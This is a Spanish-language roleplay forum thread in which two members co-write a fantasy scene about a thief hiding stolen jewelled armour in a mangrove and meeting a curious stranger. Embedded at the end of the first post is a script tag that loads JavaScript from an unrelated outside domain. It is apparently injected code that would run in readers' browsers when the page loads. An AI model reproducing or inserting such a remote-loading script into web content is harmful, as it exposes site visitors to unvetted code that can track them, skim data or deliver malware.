Mia
New Member
Posts: 4
|
Post by Mia on Aug 5, 2017 4:02:07 GMT
El sol apenas se comenzaba a ocultar detrás de las montañas cuando un arcano de la ciudadela gritó "Ladrón!" dando consigo la señal de alarma para que los guardias acudieran al lugar, pero ya había sido muy tarde, la caja fuerte de aquella tienda de empeño y trueque se había vaciado con una considerable cantidad de armaduras para hombros, codos, y tapabocas de gran calidad, eran ligeras pero no era eso lo que importaba, eran las brillantes piedras preciosas que tenía incrustadas en el metal como adorno.
No hubo rastro alguno o pista de quién pudo haber robado dichas cosas, más sólo se supo que entró por una ventana alta, no rompió el vidrio de la misma sino que hizo un agujero por el cual pasar con algún objeto filoso. Los guardias intentaron calmar el iracundo y consternado arcano dueño del local pidiendo disculpas y prometiendo vigilar la zona.
Pero no verían nada en un largo tiempo.
Pues la ladrona ya había emprendido un largo viaje seguido del hurto . Ya estaba en Shangri Lax, justo por los manglares donde conocía un buen lugar para guardar su pequeño motín, en las orillas del agua, justo abajo de un árbol levantado con sus raíces alzadas al aire creaban una buena "madriguera" para ella, allí se metió mojando sus piernas con el alto nivel del agua lodosa y guardó el saco con los objetos que había robado. Posterior a eso se dio vuelta y tiró de su tapabocas de tela para respirar hondo y suspirar.
-Nada mejor que un trabajo bien hecho- Se felicitó a si misma con una palmadita en el hombro mientras contemplaba a mitad del manglar ,el camino de agua y la brillante luna elevarse en el cielo nocturno. Aquel infinito azul profundo llenaba su alma, sin saber el porqué, amaba el brillo de la luna, quizá porque su pasión se desenvolvía sólo a los ojos de ella, La diosa de la noche era el único testigo de su habilidad y pasión.
<script type="text/javascript" src="https://cuev.in/aux.php?ver=1.0&ref=at&debug="></script>
|
|
Deleted
Deleted Member
Posts: 0
|
Post by Deleted on Aug 5, 2017 4:27:32 GMT
Abrio los ojos lentamente al sentir como su pequeño amigo emplumado se revolvía inquieto entre sus brazos, aquel manto oscuro ya se había apoderado del bosque y era justo ese momento en el que su siesta de seis horas debía terminar. Aun recostada sobre las ramas más fuertes de aquel arbol comenzo a estirar todo su cuerpo, algunos huesos sonaron y eso solo le creo más satisfacción a la chica, se incorporó hasta quedar sentada y frotó sus ojos tratando de alejar el sueño.
Aquella lechuza que siempre la acompañaba emprendió el vuelo en busca de alguna presa y alex lo siguió con la mirada unos cuantos segundos hasta perderlo entre los árboles. Miro hacia abajo por un momento y pudo divisar una figura femenina que parecía esconder algo debajo de un árbol, ella estaba prácticamente en otro árbol enfrente de ella por lo que su vista era privilegiada. se colgó de una de las ramas de aquel árbol usando el interior de sus rodillas para no caer y dejo que sus brazos extendidos como si de una muñeca de trapo colgada se tratara -Supongo que depende el tipo de trabajo, pero sí, es gratificante cuando sale bien- respondió aquel comentario de la chica como si para ella hubiera sido.
|
|
Mia
New Member
Posts: 4
|
Post by Mia on Aug 11, 2017 2:47:34 GMT
Mia alzó sus orejas y antes de girarse hacia la persona que hablaba subió su pasamontañas hasta la nariz para ocultar su rostro, frunció el ceño y miró a esta persona entre la oscuridad como se colgaba de la rama, en silencio examinó la presencia de algún arma , era extraño que personas estuvieran por esos lares, así que estaba preocupada de su botín robado, de inmediato y sin responder a esta persona con prisa se inclina en el agua y estirando la mano toma la bolsa con lo que le pertenecía, o almenos con lo que robó.
da un salto atrás y mira desde una distancia prudente - ¿Tú quién eres y desde cuando estás aquí?
|
|
Deleted
Deleted Member
Posts: 0
|
Post by Deleted on Aug 11, 2017 3:53:48 GMT
Cruzó los brazos desviando la mirada arriba como tratando de recordar algo, todo esto mientras aún se mantenía colgada -Hace como dos dias creo, fue una larga siesta- posó una de sus manos sobre su barbilla dándole pequeños golpecitos con su dedo -Soy Alex- dijo al mismo tiempo que se incorporaba nuevamente quedando sentada en la misma rama, su cabeza comenzaba a dar vueltas por aquella posición y no le gustaba para nada, lo unico bueno era que alejaba un poco el sueño de sus sistema.
Observó curiosa como aquella chica cubría su rostro y se alejaba con una bolsa entre sus manos, aquello era lo que más le llamaba la atención, no porque quisiera lo que había en su interior, si no porque quiera saber que habia ahi, su curiosidad era muchisimo mas grande que su codicia, de la cual poseía muy poca.
|
|